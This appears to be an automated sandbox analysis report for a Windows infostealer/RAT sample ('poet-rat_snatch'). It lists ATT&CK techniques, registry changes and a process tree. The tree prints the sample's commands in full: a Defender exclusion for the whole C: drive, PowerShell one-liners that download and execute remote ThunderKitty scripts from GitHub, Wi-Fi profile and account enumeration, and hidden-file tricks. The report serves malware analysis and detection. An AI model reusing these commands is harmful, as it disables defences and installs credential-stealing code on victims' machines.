8dcd33b7c93edb2315232ba4203bbc1490a1c3f4d672fda5fdf73d2da113f749

Analysis

max time kernel
133s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
21/08/2024, 21:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe
Size

14.0MB
MD5

d7524beacdb7439b2d95557c2d401575
SHA1

405accbe3741e045f135bd2a917cefe71a56f3ee
SHA256

8dcd33b7c93edb2315232ba4203bbc1490a1c3f4d672fda5fdf73d2da113f749
SHA512

a265180af4e5422bd68397146e89ab3fff1cd0e2c877a668f4c8677a50efaf1852556d74ed99eab7891bcd932cc201f9e20076053f1a68e9c66c44260fdac9cb
SSDEEP

196608:+sWQx346ioeXYk8TmIhI0bQ+ko9gvK9aXFFT:+2xcoKZ8TmsI00+kzvfz

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	5020	powershell.exe
18	2120	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4740	powershell.exe
5008	PowerShell.exe
2120	powershell.exe
5020	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4596	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	raw.githubusercontent.com
16	raw.githubusercontent.com
18	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4532	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1520	netsh.exe
3552	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4808	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
488	ipconfig.exe
4808	NETSTAT.EXE
2608	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3624	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2120	powershell.exe
4740	powershell.exe
5008	PowerShell.exe
5020	powershell.exe
2120	powershell.exe
4740	powershell.exe
5008	PowerShell.exe
5020	powershell.exe
5020	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	5008	PowerShell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	3624	taskkill.exe
Token: 33	3300	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3300	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	5020	powershell.exe
Token: SeSecurityPrivilege	5020	powershell.exe
Token: SeTakeOwnershipPrivilege	5020	powershell.exe
Token: SeLoadDriverPrivilege	5020	powershell.exe
Token: SeSystemProfilePrivilege	5020	powershell.exe
Token: SeSystemtimePrivilege	5020	powershell.exe
Token: SeProfSingleProcessPrivilege	5020	powershell.exe
Token: SeIncBasePriorityPrivilege	5020	powershell.exe
Token: SeCreatePagefilePrivilege	5020	powershell.exe
Token: SeBackupPrivilege	5020	powershell.exe
Token: SeRestorePrivilege	5020	powershell.exe
Token: SeShutdownPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeSystemEnvironmentPrivilege	5020	powershell.exe
Token: SeRemoteShutdownPrivilege	5020	powershell.exe
Token: SeUndockPrivilege	5020	powershell.exe
Token: SeManageVolumePrivilege	5020	powershell.exe
Token: 33	5020	powershell.exe
Token: 34	5020	powershell.exe
Token: 35	5020	powershell.exe
Token: 36	5020	powershell.exe
Token: SeIncreaseQuotaPrivilege	5020	powershell.exe
Token: SeSecurityPrivilege	5020	powershell.exe
Token: SeTakeOwnershipPrivilege	5020	powershell.exe
Token: SeLoadDriverPrivilege	5020	powershell.exe
Token: SeSystemProfilePrivilege	5020	powershell.exe
Token: SeSystemtimePrivilege	5020	powershell.exe
Token: SeProfSingleProcessPrivilege	5020	powershell.exe
Token: SeIncBasePriorityPrivilege	5020	powershell.exe
Token: SeCreatePagefilePrivilege	5020	powershell.exe
Token: SeBackupPrivilege	5020	powershell.exe
Token: SeRestorePrivilege	5020	powershell.exe
Token: SeShutdownPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeSystemEnvironmentPrivilege	5020	powershell.exe
Token: SeRemoteShutdownPrivilege	5020	powershell.exe
Token: SeUndockPrivilege	5020	powershell.exe
Token: SeManageVolumePrivilege	5020	powershell.exe
Token: 33	5020	powershell.exe
Token: 34	5020	powershell.exe
Token: 35	5020	powershell.exe
Token: 36	5020	powershell.exe
Token: SeIncreaseQuotaPrivilege	5020	powershell.exe
Token: SeSecurityPrivilege	5020	powershell.exe
Token: SeTakeOwnershipPrivilege	5020	powershell.exe
Token: SeLoadDriverPrivilege	5020	powershell.exe
Token: SeSystemProfilePrivilege	5020	powershell.exe
Token: SeSystemtimePrivilege	5020	powershell.exe
Token: SeProfSingleProcessPrivilege	5020	powershell.exe
Token: SeIncBasePriorityPrivilege	5020	powershell.exe
Token: SeCreatePagefilePrivilege	5020	powershell.exe
Token: SeBackupPrivilege	5020	powershell.exe
Token: SeRestorePrivilege	5020	powershell.exe
Token: SeShutdownPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeSystemEnvironmentPrivilege	5020	powershell.exe
Token: SeRemoteShutdownPrivilege	5020	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 4740	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	86
PID 1948 wrote to memory of 4740	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	86
PID 1948 wrote to memory of 5020	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	87
PID 1948 wrote to memory of 5020	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	87
PID 1948 wrote to memory of 2120	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	89
PID 1948 wrote to memory of 2120	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	89
PID 1948 wrote to memory of 1988	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	90
PID 1948 wrote to memory of 1988	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	90
PID 1948 wrote to memory of 5008	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	91
PID 1948 wrote to memory of 5008	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	91
PID 1948 wrote to memory of 2696	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	92
PID 1948 wrote to memory of 2696	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	92
PID 2696 wrote to memory of 2060	2696	cmd.exe	93
PID 2696 wrote to memory of 2060	2696	cmd.exe	93
PID 1948 wrote to memory of 4436	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	94
PID 1948 wrote to memory of 4436	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	94
PID 2120 wrote to memory of 4456	2120	powershell.exe	95
PID 2120 wrote to memory of 4456	2120	powershell.exe	95
PID 5020 wrote to memory of 4716	5020	powershell.exe	96
PID 5020 wrote to memory of 4716	5020	powershell.exe	96
PID 1948 wrote to memory of 3624	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	97
PID 1948 wrote to memory of 3624	1948	2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe	97
PID 4716 wrote to memory of 3780	4716	csc.exe	98
PID 4716 wrote to memory of 3780	4716	csc.exe	98
PID 4456 wrote to memory of 4632	4456	csc.exe	99
PID 4456 wrote to memory of 4632	4456	csc.exe	99
PID 5020 wrote to memory of 1520	5020	powershell.exe	101
PID 5020 wrote to memory of 1520	5020	powershell.exe	101
PID 5020 wrote to memory of 4432	5020	powershell.exe	105
PID 5020 wrote to memory of 4432	5020	powershell.exe	105
PID 4432 wrote to memory of 4468	4432	net.exe	106
PID 4432 wrote to memory of 4468	4432	net.exe	106
PID 5020 wrote to memory of 4596	5020	powershell.exe	107
PID 5020 wrote to memory of 4596	5020	powershell.exe	107
PID 5020 wrote to memory of 3924	5020	powershell.exe	109
PID 5020 wrote to memory of 3924	5020	powershell.exe	109
PID 5020 wrote to memory of 2184	5020	powershell.exe	110
PID 5020 wrote to memory of 2184	5020	powershell.exe	110
PID 2184 wrote to memory of 4856	2184	net.exe	111
PID 2184 wrote to memory of 4856	2184	net.exe	111
PID 5020 wrote to memory of 488	5020	powershell.exe	112
PID 5020 wrote to memory of 488	5020	powershell.exe	112
PID 5020 wrote to memory of 5044	5020	powershell.exe	113
PID 5020 wrote to memory of 5044	5020	powershell.exe	113
PID 5044 wrote to memory of 1812	5044	net.exe	114
PID 5044 wrote to memory of 1812	5044	net.exe	114
PID 5020 wrote to memory of 4764	5020	powershell.exe	115
PID 5020 wrote to memory of 4764	5020	powershell.exe	115
PID 5020 wrote to memory of 4808	5020	powershell.exe	116
PID 5020 wrote to memory of 4808	5020	powershell.exe	116
PID 5020 wrote to memory of 3852	5020	powershell.exe	117
PID 5020 wrote to memory of 3852	5020	powershell.exe	117
PID 5020 wrote to memory of 2608	5020	powershell.exe	118
PID 5020 wrote to memory of 2608	5020	powershell.exe	118
PID 5020 wrote to memory of 2340	5020	powershell.exe	119
PID 5020 wrote to memory of 2340	5020	powershell.exe	119
PID 5020 wrote to memory of 4532	5020	powershell.exe	120
PID 5020 wrote to memory of 4532	5020	powershell.exe	120
PID 5020 wrote to memory of 3552	5020	powershell.exe	121
PID 5020 wrote to memory of 3552	5020	powershell.exe	121

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4436	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-21_d7524beacdb7439b2d95557c2d401575_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ibddl0bw\ibddl0bw.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4716
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3BD.tmp" "c:\Users\Admin\AppData\Local\Temp\ibddl0bw\CSC7F4B9DDB4DDB42EE83C5CF7EB84D7A6B.TMP"
      4⤵
      PID:3780
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1520
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:4468
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4596
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:3924
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:4856
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:488
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:1812
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:4764
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:3852
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:2608
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:2340
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:4532
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2120
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c2ycntp5\c2ycntp5.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4456
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3CD.tmp" "c:\Users\Admin\AppData\Local\Temp\c2ycntp5\CSC48757552B064EF0AEE84634B4C54E1.TMP"
      4⤵
      PID:4632
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:1988
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5008
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:2060
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:4436
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3624

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x4f4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

